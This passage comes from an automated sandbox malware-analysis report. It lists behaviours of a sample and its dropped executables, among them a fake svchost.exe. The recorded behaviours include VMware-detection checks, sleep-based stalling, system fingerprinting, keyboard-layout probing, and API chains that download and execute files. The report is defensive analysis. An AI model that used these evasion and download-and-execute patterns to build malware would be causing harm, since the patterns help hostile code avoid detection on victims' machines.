Source: C:\Windows\Temp\v5.exe Code function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 4_2_00407470
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\v5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\server.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\ .exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\033726\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Temp\ .exe Code function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc. 5_2_00405DB0
Source: C:\Windows\Temp\server.exe Code function: 3_2_100022F0 3_2_100022F0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100022F0 8_2_100022F0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10001800 in eax, dx 3_2_10001800
Source: C:\Windows\Temp\v5.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\Temp\server.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\Temp\server.exe Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 3_2_100018A0
Source: C:\Windows\Temp\server.exe Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc, 3_2_10010760
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc, 8_2_10010760
Source: C:\Windows\Temp\v5.exe Code function: 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount, 2_2_00406090
Source: C:\Windows\Temp\v5.exe Code function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount, 4_2_00406090
Source: C:\Windows\Temp\ .exe Code function: GetAdaptersInfo,GetAdaptersInfo, 5_2_0042E9F0
Source: C:\Windows\Temp\ .exe Code function: SetTimer,GetAdaptersInfo, 5_2_0042F050
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 180000
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 1200000
Source: C:\Windows\Temp\server.exe Window / User API: threadDelayed 826
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 504
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 514
Source: C:\Windows\Temp\v5.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\Temp\server.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\033726\svchost.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\v5.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\033726\svchost.exe API coverage: 9.0 %
Source: C:\Windows\Temp\server.exe TID: 7476 Thread sleep count: 826 > 30
Source: C:\Windows\Temp\server.exe TID: 7476 Thread sleep time: -148680000s >= -30000s
Source: C:\Windows\Temp\server.exe TID: 7592 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Temp\server.exe TID: 7592 Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\Temp\server.exe TID: 7476 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Temp\v5.exe TID: 7756 Thread sleep count: 116 > 30
Source: C:\Windows\Temp\v5.exe TID: 7756 Thread sleep time: -2088000s >= -30000s
Source: C:\Windows\Temp\v5.exe TID: 7772 Thread sleep time: -72000s >= -30000s
Source: C:\Windows\Temp\v5.exe TID: 7752 Thread sleep count: 59 > 30
Source: C:\Windows\Temp\v5.exe TID: 7688 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848 Thread sleep count: 75 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848 Thread sleep time: -13500000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7860 Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868 Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040B
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100C
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040D
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040E
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044B
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043F
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083E
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043E
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041B
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081D
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041D
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045A
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041E
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041F
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422
Source: C:\Windows\Temp\ .exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042A
Source: C:\Windows\Temp\ .exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name="user-PC"
Source: C:\Windows\Temp\server.exe Last function: Thread delayed
Source: C:\Windows\Temp\server.exe Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405CD8 FindFirstFileA,FindClose, 0_2_00405CD8
Source: C:\Windows\Temp\server.exe Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 3_2_10001A20
Source: C:\Windows\Temp\server.exe Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 3_2_100014B0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 3_2_10008B50
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 3_2_10008520
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose, 3_2_10008E40
Source: C:\Windows\Temp\server.exe Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 3_2_100086F0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 3_2_10008F00
Source: C:\Windows\Temp\ .exe Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA, 5_2_0045B051
Source: C:\Windows\Temp\ .exe Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose, 5_2_00405260
Source: C:\Windows\Temp\ .exe Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA, 5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA, 8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose, 8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen, 8_2_100014B0
